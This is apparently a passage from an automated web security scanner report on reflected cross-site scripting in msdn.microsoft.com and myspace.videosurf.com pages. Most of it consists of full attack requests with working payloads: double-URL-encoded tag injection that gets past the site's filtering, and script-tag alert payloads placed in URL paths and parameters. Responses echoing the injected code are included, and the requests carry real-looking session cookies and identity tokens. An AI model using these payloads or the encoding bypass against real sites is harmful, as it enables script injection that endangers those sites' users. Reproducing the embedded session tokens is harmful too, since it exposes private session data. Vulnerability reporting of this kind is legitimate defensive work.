There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us/libraryfcffb%2522%253e%253ca%253e734127f3eb7/ms691105(VS.85).aspx HTTP/1.1 Host: msdn.microsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 9213 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ Set-Cookie: Sto.UserLocale=en-us; path=/ X-AspNetMvc-Version: 2.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sat, 11 Dec 2010 18:15:00 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/libraryfcffb"><a>734127f3eb7/ms691105(VS.85)" /> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 676ce%2522%253e%253ca%253e1ab5e936dbc was submitted in the REST URL parameter 3. This input was echoed as 676ce"><a>1ab5e936dbc in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us/library/ms691105(VS.85).aspx676ce%2522%253e%253ca%253e1ab5e936dbc HTTP/1.1 Host: msdn.microsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 9223 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ Set-Cookie: Sto.UserLocale=en-us; path=/ X-AspNetMvc-Version: 2.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sat, 11 Dec 2010 18:15:11 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library/ms691105(VS.85).aspx676ce"><a>1ab5e936dbc" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 389b8%2522%253e%253ca%253e0c832b23844 was submitted in the REST URL parameter 1. This input was echoed as 389b8"><a>0c832b23844 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Vary: Accept-Encoding Server: Microsoft-IIS/7.5 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ Set-Cookie: Sto.UserLocale=en-us; path=/ X-AspNetMvc-Version: 2.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sat, 11 Dec 2010 17:58:03 GMT Content-Length: 9174
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us389b8"><a>0c832b23844/library/ms951681" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 27641%2522%253e%253ca%253ec797046cb99 was submitted in the REST URL parameter 2. This input was echoed as 27641"><a>c797046cb99 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Vary: Accept-Encoding Server: Microsoft-IIS/7.5 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ Set-Cookie: Sto.UserLocale=en-us; path=/ X-AspNetMvc-Version: 2.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sat, 11 Dec 2010 17:58:35 GMT Content-Length: 9174
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library27641"><a>c797046cb99/ms951681" /> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aff27%2522%253e%253ca%253e96af2b045ba was submitted in the REST URL parameter 3. This input was echoed as aff27"><a>96af2b045ba in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Vary: Accept-Encoding Server: Microsoft-IIS/7.5 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ Set-Cookie: Sto.UserLocale=en-us; path=/ X-AspNetMvc-Version: 2.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sat, 11 Dec 2010 17:59:05 GMT Content-Length: 9184
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library/ms951681.aspxaff27"><a>96af2b045ba" /> ...[SNIP]...
2.132. http://msdn.microsoft.com/en-us/ms348103.aspx [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://msdn.microsoft.com
Path:
/en-us/ms348103.aspx
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b6f8f"><a>bfa3d2aff44 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /en-us/ms348103.aspx?b6f8f"><a>bfa3d2aff44=1 HTTP/1.1 Host: msdn.microsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 25589 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ X-AspNetMvc-Version: 2.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sat, 11 Dec 2010 18:15:37 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/ms348103.aspx?b6f8f"><a>bfa3d2aff44=1" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e44e4"><script>alert(1)</script>9820aeb12bd was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /video/brittany-mae-smith-surveillance-footage-1247969138e44e4"><script>alert(1)</script>9820aeb12bd HTTP/1.1 Host: myspace.videosurf.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3100d"><script>alert(1)</script>0c1559a14fa was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /video/e-news-now-oprah-clears-up-lesbian-rumors-12473592563100d"><script>alert(1)</script>0c1559a14fa HTTP/1.1 Host: myspace.videosurf.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xml ...[SNIP]... <meta property="og:url" content="http://myspace.videosurf.com/video/e-news-now-oprah-clears-up-lesbian-rumors-12473592563100d"><script>alert(1)</script>0c1559a14fa"/> ...[SNIP]...
2.135. http://myspace.videosurf.com/video/e-news-now-oprah-clears-up-lesbian-rumors-1247359256 [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b2ecd"><script>alert(1)</script>f0a2b614e24 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /video/e-news-now-oprah-clears-up-lesbian-rumors-1247359256?b2ecd"><script>alert(1)</script>f0a2b614e24=1 HTTP/1.1 Host: myspace.videosurf.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the vlt request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 281c1"><script>alert(1)</script>e2ff8386fd8 was submitted in the vlt parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /video/e-news-now-oprah-clears-up-lesbian-rumors-1247359256?vlt=myspace281c1"><script>alert(1)</script>e2ff8386fd8 HTTP/1.1 Host: myspace.videosurf.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b463c"><script>alert(1)</script>bb705bdfbd3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /video/saved-by-the-belding-1247850355b463c"><script>alert(1)</script>bb705bdfbd3 HTTP/1.1 Host: myspace.videosurf.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xml ...[SNIP]... <meta property="og:url" content="http://myspace.videosurf.com/video/saved-by-the-belding-1247850355b463c"><script>alert(1)</script>bb705bdfbd3"/> ...[SNIP]...
2.138. http://myspace.videosurf.com/video/saved-by-the-belding-1247850355 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://myspace.videosurf.com
Path:
/video/saved-by-the-belding-1247850355
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 11b3c"><script>alert(1)</script>6a1ae5d1e6d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /video/saved-by-the-belding-1247850355?11b3c"><script>alert(1)</script>6a1ae5d1e6d=1 HTTP/1.1 Host: myspace.videosurf.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the vlt request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8a71b"><script>alert(1)</script>fd17ed3156e was submitted in the vlt parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /video/saved-by-the-belding-1247850355?vlt=myspace8a71b"><script>alert(1)</script>fd17ed3156e HTTP/1.1 Host: myspace.videosurf.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 58fbd"><script>alert(1)</script>eb255840b05 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /video/the-creepy-hand-model-ellen-sirot-with-michaela-watkins-124799007958fbd"><script>alert(1)</script>eb255840b05 HTTP/1.1 Host: myspace.videosurf.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xml ...[SNIP]... <meta property="og:url" content="http://myspace.videosurf.com/video/the-creepy-hand-model-ellen-sirot-with-michaela-watkins-124799007958fbd"><script>alert(1)</script>eb255840b05"/> ...[SNIP]...
2.141. http://myspace.videosurf.com/video/the-creepy-hand-model-ellen-sirot-with-michaela-watkins-1247990079 [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a112e"><script>alert(1)</script>0e0865bbed4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /video/the-creepy-hand-model-ellen-sirot-with-michaela-watkins-1247990079?a112e"><script>alert(1)</script>0e0865bbed4=1 HTTP/1.1 Host: myspace.videosurf.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the vlt request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c1fed"><script>alert(1)</script>d56583518f8 was submitted in the vlt parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /video/the-creepy-hand-model-ellen-sirot-with-michaela-watkins-1247990079?vlt=myspacec1fed"><script>alert(1)</script>d56583518f8 HTTP/1.1 Host: myspace.videosurf.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d90bf"><script>alert(1)</script>b08b07e4154 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /video/the-invisibles-part-one-seaworld-english-1239815528d90bf"><script>alert(1)</script>b08b07e4154 HTTP/1.1 Host: myspace.videosurf.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xml ...[SNIP]... <meta property="og:url" content="http://myspace.videosurf.com/video/the-invisibles-part-one-seaworld-english-1239815528d90bf"><script>alert(1)</script>b08b07e4154"/> ...[SNIP]...
